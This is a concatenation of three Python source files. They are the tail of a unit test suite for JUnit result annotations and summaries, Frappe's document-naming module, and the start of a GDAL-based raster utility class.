UnitTestCase(result_file='result-file1', test_file=None, line=None, class_name='class2', test_name='test2', result='success', message=None, content=None, time=None)
])),
('skipped', list([
UnitTestCase(result_file='result-file1', test_file=None, line=None, class_name='class2', test_name='test2', result='skipped', message=None, content=None, time=None)
])),
('failure', list([
UnitTestCase(result_file='result-file1', test_file=None, line=None, class_name='class2', test_name='test2', result='failure', message=None, content=None, time=None)
])),
('error', list([
UnitTestCase(result_file='result-file1', test_file=None, line=None, class_name='class2', test_name='test2', result='error', message=None, content=None, time=None)
])),
]))
])
expected = CaseMessages([
((None, 'class1', 'test1'), dict([
('success', defaultdict(list, [
('content1', list([
UnitTestCase(result_file='result-file1', test_file='file1', line=1, class_name='class1', test_name='test1', result='success', message='message1', content='content1', time=1.0),
UnitTestCase(result_file='result-file1', test_file='file1', line=1, class_name='class1', test_name='test1', result='success', message='message1', content='content1', time=1.1),
])),
('content2', list([
UnitTestCase(result_file='result-file1', test_file='file1', line=1, class_name='class1', test_name='test1', result='success', message='message2', content='content2', time=1.2),
]))
])),
('skipped', defaultdict(list, [
('message2', list([
UnitTestCase(result_file='result-file1', test_file='file1', line=1, class_name='class1', test_name='test1', result='skipped', message='message2', content='content2', time=None),
])),
('message3', list([
UnitTestCase(result_file='result-file1', test_file='file1', line=1, class_name='class1', test_name='test1', result='skipped', message='message3', content='content3', time=None),
]))
])),
('failure', defaultdict(list, [
('content4', list([
UnitTestCase(result_file='result-file1', test_file='file1', line=1, class_name='class1', test_name='test1', result='failure', message='message4', content='content4', time=1.23),
UnitTestCase(result_file='result-file1', test_file='file1', line=1, class_name='class1', test_name='test1', result='failure', message='message4', content='content4', time=1.234),
])),
])),
('error', defaultdict(list, [
('content5', list([
UnitTestCase(result_file='result-file1', test_file='file1', line=1, class_name='class1', test_name='test1', result='error', message='message5', content='content5', time=1.2345),
])),
])),
])),
((None, 'class2', 'test2'), dict([
('success', dict([
(None, list([
UnitTestCase(result_file='result-file1', test_file=None, line=None, class_name='class2', test_name='test2', result='success', message=None, content=None, time=None)
])),
])),
('skipped', dict([
(None, list([
UnitTestCase(result_file='result-file1', test_file=None, line=None, class_name='class2', test_name='test2', result='skipped', message=None, content=None, time=None)
])),
])),
('failure', dict([
(None, list([
UnitTestCase(result_file='result-file1', test_file=None, line=None, class_name='class2', test_name='test2', result='failure', message=None, content=None, time=None)
])),
])),
('error', dict([
(None, list([
UnitTestCase(result_file='result-file1', test_file=None, line=None, class_name='class2', test_name='test2', result='error', message=None, content=None, time=None)
])),
])),
]))
])
actual = get_case_messages(results)
self.assertEqual(expected, actual)
def test_annotation_to_dict(self):
annotation = Annotation(path='file1', start_line=123, end_line=123, start_column=4, end_column=5, annotation_level='notice', message='result-file1', title='1 out of 6 runs skipped: test1', raw_details='message2')
self.assertEqual(dict(path='file1', start_line=123, end_line=123, start_column=4, end_column=5, annotation_level='notice', message='result-file1', title='1 out of 6 runs skipped: test1', raw_details='message2'), annotation.to_dict())
annotation = Annotation(path='class2', start_line=0, end_line=0, start_column=None, end_column=None, annotation_level='failure', message='result-file1', title='1 out of 4 runs with error: test2 (class2)', raw_details=None)
self.assertEqual(dict(path='class2', start_line=0, end_line=0, annotation_level='failure', message='result-file1', title='1 out of 4 runs with error: test2 (class2)'), annotation.to_dict())
annotation = Annotation(path='file', start_line=0, end_line=0, start_column=None, end_column=None, annotation_level='notice', message='message', title=None, raw_details=None)
self.assertEqual(dict(path='file', start_line=0, end_line=0, annotation_level='notice', message='message'), annotation.to_dict())
def test_annotation_to_dict_abbreviation(self):
annotation = Annotation(path='file', start_line=123, end_line=123, start_column=None, end_column=None, annotation_level='notice', message='message ' * 8000, title='title - ' * 31, raw_details='raw ' * 16000)
self.assertEqual('message ' * 8000, annotation.to_dict().get('message'))
self.assertEqual('title - ' * 31, annotation.to_dict().get('title'))
self.assertEqual('raw ' * 16000, annotation.to_dict().get('raw_details'))
annotation = Annotation(path='file', start_line=123, end_line=123, start_column=None, end_column=None, annotation_level='notice', message='message ' * 8001, title='title - ' * 32, raw_details='raw ' * 16001)
self.assertEqual('message ' * 3999 + 'message…ssage ' + 'message ' * 3999, annotation.to_dict().get('message'))
self.assertEqual('title - ' * 15 + 'title -…itle - ' + 'title - ' * 15, annotation.to_dict().get('title'))
self.assertEqual('raw ' * 8000 + '…aw ' + 'raw ' * 7999, annotation.to_dict().get('raw_details'))
def test_get_case_annotation(self):
messages = CaseMessages([
((None, 'class1', 'test1'), dict([
('success', dict([
('message1', list([
UnitTestCase(result_file='result-file1', test_file='file1', line=123, class_name='class1', test_name='test1', result='success', message='message1', content=None, time=1.0)
]))
])),
('skipped', dict([
('message2', list([
UnitTestCase(result_file='result-file1', test_file='file1', line=123, class_name=None, test_name='test1', result='skipped', message='message2', content=None, time=1.0)
]))
])),
('failure', dict([
('message3', list([
UnitTestCase(result_file='result-file1', test_file='file1', line=123, class_name='', test_name='test1', result='failure', message='message3', content=None, time=1.0)
])),
('message4', list([
UnitTestCase(result_file='result-file2', test_file='file1', line=123, class_name='class1', test_name='test1', result='failure', message='message4', content=None, time=1.0),
UnitTestCase(result_file='result-file3', test_file='file1', line=123, class_name='class1', test_name='test1', result='failure', message='message4', content=None, time=1.0)
])),
])),
('error', dict([
('message5', list([
UnitTestCase(result_file='result-file1', test_file='file1', line=123, class_name='class1', test_name='test1', result='error', message='message6', content=None, time=1.0)
]))
])),
])),
((None, 'class2', 'test2'), dict([
('success', dict([
(None, list([
UnitTestCase(result_file='result-file1', test_file=None, line=None, class_name='class2', test_name='test2', result='success', message=None, content=None, time=None)
])),
])),
('skipped', dict([
(None, list([
UnitTestCase(result_file='result-file1', test_file=None, line=None, class_name='class2', test_name='test2', result='skipped', message=None, content=None, time=None)
])),
])),
('failure', dict([
(None, list([
UnitTestCase(result_file='result-file1', test_file=None, line=None, class_name='class2', test_name='test2', result='failure', message=None, content=None, time=None)
])),
])),
('error', dict([
(None, list([
UnitTestCase(result_file='result-file1', test_file=None, line=None, class_name='class2', test_name='test2', result='error', message=None, content=None, time=None)
])),
])),
]))
])
self.assertEqual(Annotation(path='file1', start_line=123, end_line=123, start_column=None, end_column=None, annotation_level='notice', message='result-file1', title='1 out of 6 runs skipped: test1', raw_details='message2'), get_case_annotation(messages, (None, 'class1', 'test1'), 'skipped', 'message2', report_individual_runs=False))
self.assertEqual(Annotation(path='file1', start_line=123, end_line=123, start_column=None, end_column=None, annotation_level='warning', message='result-file1\nresult-file2\nresult-file3', title='3 out of 6 runs failed: test1', raw_details='message3'), get_case_annotation(messages, (None, 'class1', 'test1'), 'failure', 'message3', report_individual_runs=False))
self.assertEqual(Annotation(path='file1', start_line=123, end_line=123, start_column=None, end_column=None, annotation_level='warning', message='result-file1\nresult-file2\nresult-file3', title='3 out of 6 runs failed: test1 (class1)', raw_details='message4'), get_case_annotation(messages, (None, 'class1', 'test1'), 'failure', 'message4', report_individual_runs=False))
self.assertEqual(Annotation(path='file1', start_line=123, end_line=123, start_column=None, end_column=None, annotation_level='failure', message='result-file1', title='1 out of 6 runs with error: test1 (class1)', raw_details='message5'), get_case_annotation(messages, (None, 'class1', 'test1'), 'error', 'message5', report_individual_runs=False))
self.assertEqual(Annotation(path='class2', start_line=0, end_line=0, start_column=None, end_column=None, annotation_level='notice', message='result-file1', title='1 out of 4 runs skipped: test2 (class2)', raw_details=None), get_case_annotation(messages, (None, 'class2', 'test2'), 'skipped', None, report_individual_runs=False))
self.assertEqual(Annotation(path='class2', start_line=0, end_line=0, start_column=None, end_column=None, annotation_level='warning', message='result-file1', title='1 out of 4 runs failed: test2 (class2)', raw_details=None), get_case_annotation(messages, (None, 'class2', 'test2'), 'failure', None, report_individual_runs=False))
self.assertEqual(Annotation(path='class2', start_line=0, end_line=0, start_column=None, end_column=None, annotation_level='failure', message='result-file1', title='1 out of 4 runs with error: test2 (class2)', raw_details=None), get_case_annotation(messages, (None, 'class2', 'test2'), 'error', None, report_individual_runs=False))
def test_get_case_annotation_report_individual_runs(self):
messages = CaseMessages([
((None, 'class1', 'test1'), dict([
('success', dict([
('message1', list([
UnitTestCase(result_file='result-file1', test_file='file1', line=123, class_name='class1', test_name='test1', result='success', message='message1', content=None, time=1.0)
]))
])),
('skipped', dict([
('message2', list([
UnitTestCase(result_file='result-file1', test_file='file1', line=123, class_name=None, test_name='test1', result='skipped', message='message2', content=None, time=None)
]))
])),
('failure', dict([
('message3', list([
UnitTestCase(result_file='result-file1', test_file='file1', line=123, class_name='', test_name='test1', result='failure', message='message3', content=None, time=1.23)
])),
('message4', list([
UnitTestCase(result_file='result-file2', test_file='file1', line=123, class_name='class1', test_name='test1', result='failure', message='message4', content=None, time=1.234),
UnitTestCase(result_file='result-file3', test_file='file1', line=123, class_name='class1', test_name='test1', result='failure', message='message4', content=None, time=1.234)
])),
])),
('error', dict([
('message5', list([
UnitTestCase(result_file='result-file1', test_file='file1', line=123, class_name='class1', test_name='test1', result='error', message='message6', content=None, time=1.2345)
]))
])),
]))
])
self.assertEqual(Annotation(path='file1', start_line=123, end_line=123, start_column=None, end_column=None, annotation_level='notice', message='result-file1', title='1 out of 6 runs skipped: test1', raw_details='message2'), get_case_annotation(messages, (None, 'class1', 'test1'), 'skipped', 'message2', report_individual_runs=True))
self.assertEqual(Annotation(path='file1', start_line=123, end_line=123, start_column=None, end_column=None, annotation_level='warning', message='result-file1', title='1 out of 6 runs failed: test1', raw_details='message3'), get_case_annotation(messages, (None, 'class1', 'test1'), 'failure', 'message3', report_individual_runs=True))
self.assertEqual(Annotation(path='file1', start_line=123, end_line=123, start_column=None, end_column=None, annotation_level='warning', message='result-file2\nresult-file3', title='2 out of 6 runs failed: test1 (class1)', raw_details='message4'), get_case_annotation(messages, (None, 'class1', 'test1'), 'failure', 'message4', report_individual_runs=True))
self.assertEqual(Annotation(path='file1', start_line=123, end_line=123, start_column=None, end_column=None, annotation_level='failure', message='result-file1', title='1 out of 6 runs with error: test1 (class1)', raw_details='message5'), get_case_annotation(messages, (None, 'class1', 'test1'), 'error', 'message5', report_individual_runs=True))
def test_get_case_annotations(self):
results = UnitTestCaseResults([
((None, 'class1', 'test1'), dict([
('success', list([
UnitTestCase(result_file='result-file1', test_file='file1', line=123, class_name='class1', test_name='test1', result='success', message='success message', content='success content', time=1.0)
])),
('skipped', list([
UnitTestCase(result_file='result-file1', test_file='file1', line=123, class_name=None, test_name='test1', result='skipped', message='skip message', content='skip content', time=None)
])),
('failure', list([
UnitTestCase(result_file='result-file1', test_file='file1', line=123, class_name='class1', test_name='test1', result='failure', message='fail message 1', content='fail content 1', time=1.2),
UnitTestCase(result_file='result-file2', test_file='file1', line=123, class_name='class1', test_name='test1', result='failure', message='fail message 2', content='fail content 2', time=1.23),
UnitTestCase(result_file='result-file3', test_file='file1', line=123, class_name='class1', test_name='test1', result='failure', message='fail message 2', content='fail content 2', time=1.234)
])),
('error', list([
UnitTestCase(result_file='result-file1', test_file='file1', line=123, class_name='class1', test_name='test1', result='error', message='error message', content='error content', time=1.2345)
])),
])),
((None, 'class2', 'test2'), dict([
('success', list([
UnitTestCase(result_file='result-file1', test_file=None, line=None, class_name='class2', test_name='test2', result='success', message=None, content=None, time=None)
])),
('skipped', list([
UnitTestCase(result_file='result-file1', test_file=None, line=None, class_name='class2', test_name='test2', result='skipped', message=None, content=None, time=None)
])),
('failure', list([
UnitTestCase(result_file='result-file1', test_file=None, line=None, class_name='class2', test_name='test2', result='failure', message=None, content=None, time=None)
])),
('error', list([
UnitTestCase(result_file='result-file1', test_file=None, line=None, class_name='class2', test_name='test2', result='error', message=None, content=None, time=None)
])),
]))
])
expected = [
Annotation(
annotation_level='warning',
end_column=None,
end_line=123,
message='result-file1\nresult-file2\nresult-file3',
path='file1',
start_column=None,
start_line=123,
title='3 out of 6 runs failed: test1 (class1)',
raw_details='fail content 1'
), Annotation(
annotation_level='failure',
end_column=None,
end_line=123,
message='result-file1',
path='file1',
start_column=None,
start_line=123,
title='1 out of 6 runs with error: test1 (class1)',
raw_details='error content'
), Annotation(
annotation_level='warning',
end_column=None,
end_line=0,
message='result-file1',
path='class2',
start_column=None,
start_line=0,
title='1 out of 4 runs failed: test2 (class2)',
raw_details=None
), Annotation(
annotation_level='failure',
end_column=None,
end_line=0,
message='result-file1',
path='class2',
start_column=None,
start_line=0,
title='1 out of 4 runs with error: test2 (class2)',
raw_details=None
),
]
annotations = get_case_annotations(results, report_individual_runs=False)
self.assertEqual(expected, annotations)
def test_get_case_annotations_report_individual_runs(self):
results = UnitTestCaseResults([
((None, 'class1', 'test1'), dict([
('success', list([
UnitTestCase(result_file='result-file1', test_file='file1', line=123, class_name='class1', test_name='test1', result='success', message='success message', content='success content', time=1.0)
])),
('skipped', list([
UnitTestCase(result_file='result-file1', test_file='file1', line=123, class_name=None, test_name='test1', result='skipped', message='skip message', content='skip content', time=None)
])),
('failure', list([
UnitTestCase(result_file='result-file1', test_file='file1', line=123, class_name='class1', test_name='test1', result='failure', message='fail message 1', content='fail content 1', time=1.2),
UnitTestCase(result_file='result-file2', test_file='file1', line=123, class_name='class1', test_name='test1', result='failure', message='fail message 2', content='fail content 2', time=1.23),
UnitTestCase(result_file='result-file3', test_file='file1', line=123, class_name='class1', test_name='test1', result='failure', message='fail message 2', content='fail content 2', time=1.234)
])),
('error', list([
UnitTestCase(result_file='result-file1', test_file='file1', line=123, class_name='class1', test_name='test1', result='error', message='error message', content='error content', time=0.1)
])),
]))
])
expected = [
Annotation(
annotation_level='warning',
end_column=None,
end_line=123,
message='result-file1',
path='file1',
start_column=None,
start_line=123,
title='1 out of 6 runs failed: test1 (class1)',
raw_details='fail content 1'
), Annotation(
annotation_level='warning',
end_column=None,
end_line=123,
message='result-file2\nresult-file3',
path='file1',
start_column=None,
start_line=123,
title='2 out of 6 runs failed: test1 (class1)',
raw_details='fail content 2'
), Annotation(
annotation_level='failure',
end_column=None,
end_line=123,
message='result-file1',
path='file1',
start_column=None,
start_line=123,
title='1 out of 6 runs with error: test1 (class1)',
raw_details='error content'
)
]
annotations = get_case_annotations(results, report_individual_runs=True)
self.assertEqual(expected, annotations)
def test_get_error_annotation(self):
self.assertEqual(Annotation(path='file', start_line=0, end_line=0, start_column=None, end_column=None, annotation_level='failure', message='message', title='Error processing result file', raw_details='file'), get_error_annotation(ParseError('file', 'message', None, None)))
self.assertEqual(Annotation(path='file', start_line=12, end_line=12, start_column=None, end_column=None, annotation_level='failure', message='message', title='Error processing result file', raw_details='file'), get_error_annotation(ParseError('file', 'message', 12, None)))
self.assertEqual(Annotation(path='file', start_line=12, end_line=12, start_column=34, end_column=34, annotation_level='failure', message='message', title='Error processing result file', raw_details='file'), get_error_annotation(ParseError('file', 'message', 12, 34)))
def test_get_all_tests_list_annotation(self):
results = UnitTestCaseResults([
((None, 'class1', 'test2'), dict([
('success', list([
UnitTestCase(result_file='result-file1', test_file='file1', line=123, class_name='class1', test_name='test2', result='success', message='success message', content='success content', time=1.0)
])),
])),
((None, 'class1', 'test1'), dict([
('success', list([
UnitTestCase(result_file='result-file1', test_file='file1', line=123, class_name='class1', test_name='test1', result='success', message='success message', content='success content', time=1.0)
])),
('skipped', list([
UnitTestCase(result_file='result-file1', test_file='file1', line=123, class_name=None, test_name='test1', result='skipped', message='skip message', content='skip content', time=None)
])),
])),
(('file', 'class1', 'test2'), dict([
('success', list([
UnitTestCase(result_file='result-file1', test_file='file1', line=123, class_name='class1', test_name='test2', result='success', message='success message', content='success content', time=1.0)
])),
]))
])
self.assertIsNone(get_all_tests_list_annotation(UnitTestCaseResults()))
self.assertEqual(Annotation(path='.github', start_line=0, end_line=0, start_column=None, end_column=None, annotation_level='notice', message='There are 3 tests, see "Raw output" for the full list of tests.', title='3 tests found', raw_details='class1 ‑ test1\nclass1 ‑ test2\nfile ‑ class1 ‑ test2'), get_all_tests_list_annotation(results))
del results[(None, 'class1', 'test1')]
del results[('file', 'class1', 'test2')]
self.assertEqual(Annotation(path='.github', start_line=0, end_line=0, start_column=None, end_column=None, annotation_level='notice', message='There is 1 test, see "Raw output" for the name of the test.', title='1 test found', raw_details='class1 ‑ test2'), get_all_tests_list_annotation(results))
def test_get_skipped_tests_list_annotation(self):
results = UnitTestCaseResults([
((None, 'class1', 'test2'), dict([
('skipped', list([
UnitTestCase(result_file='result-file1', test_file='file1', line=123, class_name='class1', test_name='test2', result='success', message='success message', content='success content', time=1.0)
])),
])),
((None, 'class1', 'test1'), dict([
('success', list([
UnitTestCase(result_file='result-file1', test_file='file1', line=123, class_name='class1', test_name='test1', result='success', message='success message', content='success content', time=1.0)
])),
('skipped', list([
UnitTestCase(result_file='result-file1', test_file='file1', line=123, class_name=None, test_name='test1', result='skipped', message='skip message', content='skip content', time=None)
])),
])),
(('file', 'class1', 'test2'), dict([
('success', list([
UnitTestCase(result_file='result-file1', test_file='file1', line=123, class_name='class1', test_name='test2', result='success', message='success message', content='success content', time=1.0)
])),
]))
])
self.assertIsNone(get_skipped_tests_list_annotation(UnitTestCaseResults()))
self.assertEqual(Annotation(path='.github', start_line=0, end_line=0, start_column=None, end_column=None, annotation_level='notice', message='There is 1 skipped test, see "Raw output" for the name of the skipped test.', title='1 skipped test found', raw_details='class1 ‑ test2'), get_skipped_tests_list_annotation(results))
del results[(None, 'class1', 'test1')]['success']
self.assertEqual(Annotation(path='.github', start_line=0, end_line=0, start_column=None, end_column=None, annotation_level='notice', message='There are 2 skipped tests, see "Raw output" for the full list of skipped tests.', title='2 skipped tests found', raw_details='class1 ‑ test1\nclass1 ‑ test2'), get_skipped_tests_list_annotation(results))
def test_files(self):
parsed = parse_junit_xml_files(['files/junit.gloo.elastic.spark.tf.xml',
'files/junit.gloo.elastic.spark.torch.xml',
'files/junit.gloo.elastic.xml',
'files/junit.gloo.standalone.xml',
'files/junit.gloo.static.xml',
'files/junit.mpi.integration.xml',
'files/junit.mpi.standalone.xml',
'files/junit.mpi.static.xml',
'files/junit.spark.integration.1.xml',
'files/junit.spark.integration.2.xml']).with_commit('example')
results = get_test_results(parsed, False)
stats = get_stats(results)
md = get_long_summary_md(stats)
self.assertEqual(md, (' 10 files 10 suites 39m 1s :stopwatch:\n'
'217 tests 208 :heavy_check_mark: 9 :zzz: 0 :x:\n'
'373 runs 333 :heavy_check_mark: 40 :zzz: 0 :x:\n'
'\n'
'Results for commit example.\n'))
def test_file_without_cases(self):
parsed = parse_junit_xml_files(['files/no-cases.xml']).with_commit('a commit sha')
results = get_test_results(parsed, False)
stats = get_stats(results)
md = get_long_summary_md(stats)
self.assertEqual(md, ('1 files 1 suites 0s :stopwatch:\n'
'0 tests 0 :heavy_check_mark: 0 :zzz: 0 :x:\n'
'\n'
'Results for commit a commit.\n'))
def test_non_parsable_file(self):
parsed = parse_junit_xml_files(['files/empty.xml']).with_commit('a commit sha')
results = get_test_results(parsed, False)
stats = get_stats(results)
md = get_long_summary_md(stats)
self.assertEqual(md, ('1 files 1 errors 0 suites 0s :stopwatch:\n'
'0 tests 0 :heavy_check_mark: 0 :zzz: 0 :x:\n'
'\n'
'Results for commit a commit.\n'))
if __name__ == '__main__':
unittest.main()
|
py | 1a3f90da3746c2453e41bab59b5bd66999ee8353 | # Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
# MIT License. See license.txt
from __future__ import unicode_literals
import frappe
from frappe import _
from frappe.utils import now_datetime, cint, cstr
import re
from six import string_types
from frappe.model import log_types
def set_new_name(doc):
"""
Sets the `name` property for the document based on various rules.
1. If amended doc, set suffix.
2. If `autoname` method is declared, then call it.
3. If `autoname` property is set in the DocType (`meta`), then build it using the `autoname` property.
4. If no rule defined, use hash.
:param doc: Document to be named.
"""
doc.run_method("before_naming")
autoname = frappe.get_meta(doc.doctype).autoname or ""
if autoname.lower() != "prompt" and not frappe.flags.in_import:
doc.name = None
if getattr(doc, "amended_from", None):
_set_amended_name(doc)
return
elif getattr(doc.meta, "issingle", False):
doc.name = doc.doctype
elif getattr(doc.meta, "istable", False):
doc.name = make_autoname("hash", doc.doctype)
if not doc.name:
set_naming_from_document_naming_rule(doc)
if not doc.name:
doc.run_method("autoname")
if not doc.name and autoname:
set_name_from_naming_options(autoname, doc)
# if the autoname option is 'field:' and no name was derived, we need to
# notify
if not doc.name and autoname.startswith("field:"):
fieldname = autoname[6:]
frappe.throw(_("{0} is required").format(doc.meta.get_label(fieldname)))
# at this point, we fall back to name generation with the hash option
if not doc.name and autoname == "hash":
doc.name = make_autoname("hash", doc.doctype)
if not doc.name:
doc.name = make_autoname("hash", doc.doctype)
doc.name = validate_name(
doc.doctype,
doc.name,
frappe.get_meta(doc.doctype).get_field("name_case")
)
def set_name_from_naming_options(autoname, doc):
"""
Get a name based on the autoname field option
"""
_autoname = autoname.lower()
if _autoname.startswith("field:"):
doc.name = _field_autoname(autoname, doc)
elif _autoname.startswith("naming_series:"):
set_name_by_naming_series(doc)
elif _autoname.startswith("prompt"):
_prompt_autoname(autoname, doc)
elif _autoname.startswith("format:"):
doc.name = _format_autoname(autoname, doc)
elif "#" in autoname:
doc.name = make_autoname(autoname, doc=doc)
def set_naming_from_document_naming_rule(doc):
'''
Evaluate rules based on "Document Naming Series" doctype
'''
if doc.doctype in log_types:
return
# ignore_ddl if naming is not yet bootstrapped
for d in frappe.get_all('Document Naming Rule',
dict(document_type=doc.doctype, disabled=0), order_by='priority desc', ignore_ddl=True):
frappe.get_cached_doc('Document Naming Rule', d.name).apply(doc)
if doc.name:
break
def set_name_by_naming_series(doc):
"""Sets name by the `naming_series` property"""
if not doc.naming_series:
doc.naming_series = get_default_naming_series(doc.doctype)
if not doc.naming_series:
frappe.throw(frappe._("Naming Series mandatory"))
doc.name = make_autoname(doc.naming_series+".#####", "", doc)
def make_autoname(key="", doctype="", doc=""):
"""
Creates an autoname from the given key:
**Autoname rules:**
* The key is separated by '.'
* '####' represents a series. The string before this part becomes the prefix:
Example: ABC.#### creates a series ABC0001, ABC0002 etc
* 'MM' represents the current month
* 'YY' and 'YYYY' represent the current year
*Example:*
* DE/./.YY./.MM./.##### will create a series like
DE/09/01/0001 where 09 is the year, 01 is the month and 0001 is the series
"""
if key == "hash":
return frappe.generate_hash(doctype, 10)
if "#" not in key:
key = key + ".#####"
elif "." not in key:
error_message = _("Invalid naming series (. missing)")
if doctype:
error_message = _("Invalid naming series (. missing) for {0}").format(doctype)
frappe.throw(error_message)
parts = key.split('.')
n = parse_naming_series(parts, doctype, doc)
return n
def parse_naming_series(parts, doctype='', doc=''):
n = ''
if isinstance(parts, string_types):
parts = parts.split('.')
series_set = False
today = now_datetime()
for e in parts:
part = ''
if e.startswith('#'):
if not series_set:
digits = len(e)
part = getseries(n, digits)
series_set = True
elif e == 'YY':
part = today.strftime('%y')
elif e == 'MM':
part = today.strftime('%m')
elif e == 'DD':
part = today.strftime("%d")
elif e == 'YYYY':
part = today.strftime('%Y')
elif e == 'timestamp':
part = str(today)
elif e == 'FY':
part = frappe.defaults.get_user_default("fiscal_year")
elif e.startswith('{') and doc:
e = e.replace('{', '').replace('}', '')
part = doc.get(e)
elif doc and doc.get(e):
part = doc.get(e)
else:
part = e
if isinstance(part, string_types):
n += part
return n
def getseries(key, digits):
# series created ?
current = frappe.db.sql("SELECT `current` FROM `tabSeries` WHERE `name`=%s FOR UPDATE", (key,))
if current and current[0][0] is not None:
current = current[0][0]
# yes, update it
frappe.db.sql("UPDATE `tabSeries` SET `current` = `current` + 1 WHERE `name`=%s", (key,))
current = cint(current) + 1
else:
# no, create it
frappe.db.sql("INSERT INTO `tabSeries` (`name`, `current`) VALUES (%s, 1)", (key,))
current = 1
return ('%0'+str(digits)+'d') % current
def revert_series_if_last(key, name, doc=None):
if ".#" in key:
prefix, hashes = key.rsplit(".", 1)
if "#" not in hashes:
return
else:
prefix = key
if '.' in prefix:
prefix = parse_naming_series(prefix.split('.'), doc=doc)
count = cint(name.replace(prefix, ""))
current = frappe.db.sql("SELECT `current` FROM `tabSeries` WHERE `name`=%s FOR UPDATE", (prefix,))
if current and current[0][0]==count:
frappe.db.sql("UPDATE `tabSeries` SET `current` = `current` - 1 WHERE `name`=%s", prefix)
def get_default_naming_series(doctype):
"""get default value for `naming_series` property"""
naming_series = frappe.get_meta(doctype).get_field("naming_series").options or ""
if naming_series:
naming_series = naming_series.split("\n")
return naming_series[0] or naming_series[1]
else:
return None
def validate_name(doctype, name, case=None, merge=False):
if not name:
frappe.throw(_("No Name Specified for {0}").format(doctype))
if name.startswith("New "+doctype):
frappe.throw(_("There were some errors setting the name, please contact the administrator"), frappe.NameError)
if case == "Title Case":
name = name.title()
if case == "UPPER CASE":
name = name.upper()
name = name.strip()
if not frappe.get_meta(doctype).get("issingle") and (doctype == name) and (name != "DocType"):
frappe.throw(_("Name of {0} cannot be {1}").format(doctype, name), frappe.NameError)
special_characters = "<>"
if re.findall("[{0}]+".format(special_characters), name):
message = ", ".join("'{0}'".format(c) for c in special_characters)
frappe.throw(_("Name cannot contain special characters like {0}").format(message), frappe.NameError)
return name
def append_number_if_name_exists(doctype, value, fieldname="name", separator="-", filters=None):
if not filters:
filters = dict()
filters.update({fieldname: value})
exists = frappe.db.exists(doctype, filters)
regex = "^{value}{separator}\d+$".format(value=re.escape(value), separator=separator)
if exists:
last = frappe.db.sql("""SELECT `{fieldname}` FROM `tab{doctype}`
WHERE `{fieldname}` {regex_character} %s
ORDER BY length({fieldname}) DESC,
`{fieldname}` DESC LIMIT 1""".format(
doctype=doctype,
fieldname=fieldname,
regex_character=frappe.db.REGEX_CHARACTER),
regex)
if last:
count = str(cint(last[0][0].rsplit(separator, 1)[1]) + 1)
else:
count = "1"
value = "{0}{1}{2}".format(value, separator, count)
return value
def _set_amended_name(doc):
am_id = 1
am_prefix = doc.amended_from
if frappe.db.get_value(doc.doctype, doc.amended_from, "amended_from"):
am_id = cint(doc.amended_from.split("-")[-1]) + 1
am_prefix = "-".join(doc.amended_from.split("-")[:-1]) # except the last hyphen
doc.name = am_prefix + "-" + str(am_id)
return doc.name
def _field_autoname(autoname, doc, skip_slicing=None):
"""
Generate a name using `DocType` field. This is called when the doctype's
`autoname` field starts with 'field:'
"""
fieldname = autoname if skip_slicing else autoname[6:]
name = (cstr(doc.get(fieldname)) or "").strip()
return name
def _prompt_autoname(autoname, doc):
"""
Generate a name using Prompt option. This simply means the user will have to set the name manually.
This is called when the doctype's `autoname` field starts with 'prompt'.
"""
# set from __newname in save.py
if not doc.name:
frappe.throw(_("Name not set via prompt"))
def _format_autoname(autoname, doc):
"""
Generate autoname by replacing all instances of braced params (fields, date params ('DD', 'MM', 'YY'), series)
Independent of remaining string or separators.
Example pattern: 'format:LOG-{MM}-{fieldname1}-{fieldname2}-{#####}'
"""
first_colon_index = autoname.find(":")
autoname_value = autoname[first_colon_index + 1:]
def get_param_value_for_match(match):
param = match.group()
# trim braces
trimmed_param = param[1:-1]
return parse_naming_series([trimmed_param], doc=doc)
# Replace braced params with their parsed value
name = re.sub(r"(\{[\w | #]+\})", get_param_value_for_match, autoname_value)
return name
|
py | 1a3f91850b9a2d6a2d2ef266581f6a8366fa6d49 | # Version 1.0; Erik Husby; Polar Geospatial Center, University of Minnesota; 2017
from __future__ import division
import os
import numbers
from operator import itemgetter
import gdal, ogr, osgeo, osr
import numpy as np
PROJREF_POLAR_STEREO = """PROJCS["unnamed",GEOGCS["WGS 84",DATUM["WGS_1984",SPHEROID["WGS 84",6378137,298.257223563,AUTHORITY["EPSG","7030"]],AUTHORITY["EPSG","6326"]],PRIMEM["Greenwich",0],UNIT["degree",0.0174532925199433],AUTHORITY["EPSG","4326"]],PROJECTION["Polar_Stereographic"],PARAMETER["latitude_of_origin",-70],PARAMETER["central_meridian",0],PARAMETER["scale_factor",1],PARAMETER["false_easting",0],PARAMETER["false_northing",0],UNIT["metre",1,AUTHORITY["EPSG","9001"]]]"""
RASTER_DEFAULT_PROJREF = PROJREF_POLAR_STEREO
gdal.UseExceptions()
class RasterIOError(Exception):
def __init__(self, msg=""):
self.msg = msg
def __str__(self):
return repr(self.msg)
class InvalidArgumentError(Exception):
def __init__(self, msg=""):
self.msg = msg
def __str__(self):
return repr(self.msg)
class Raster:
"""
*** NOTE THAT ONLY 'NORTH-UP' GEOTIFF IMAGES ARE FULLY SUPPORTED AT THIS TIME ***
Contains methods to extract pixel data, geotransform, projection, corner coordinates, geometry,
and other associated information from a raster image, built on the framework provided by GDAL's
GDALDataset class.
Additionally, 'smart' getter and setter methods are provided for all data members listed in the
class initialization (data members are referred to as a raster's 'parameters' hereafter) that
make it possible to store and modify the values of useful parameters while maintaining a
self-consistent dataset.
A Raster instance starts with all parameters set to None, except for those whose names are
provided to the initialization call as additional arguments beyond the first.
As for the first argument, if it is a path to a valid raster file (or equivalently, if it is an
osgeo.gdal.Dataset object), all values of those parameters which are to be set will be extracted
directly from the provided raster dataset. If 'ds' is not included in that list (or equivalently,
'all' and 'no-ds' are included), the class will not keep a reference to the raster dataset in
its 'ds' parameter after initialization is complete.
If the first argument is instead None, those parameters which are to be set will be set to their
respective default values (as retrieved from the getter methods mentioned later).
After initialization, setting individual parameters should be done via the Raster.set_param()
method. Since changing the value of one parameter of a raster image (such as the 'x' array of
horizontal grid coordinates) may affect the (x-)size of the image in pixel SHAPE, the RESOLUTION
of the image pixels (in the x-direction, dx), and the geographic EXTENT of the image (in its
x-coordinates), to maintain a self-consistent dataset any modifications should be propagated to
those parameters that are based on the same core values of SHAPE, RESOLUTION, or EXTENT.
This is done by default, but may be turned off by passing the 'prop' keyword argument as False.
Core values for each property -- SHAPE ('shape'), RESOLUTION ('dx', 'dy', 'res', the dx and dy
parts of 'geo_trans'), EXTENT (the xmin and ymax parts of 'geo_trans') -- may be set (remember,
every parameter is initialized to None unless specifically set) automatically by passing the
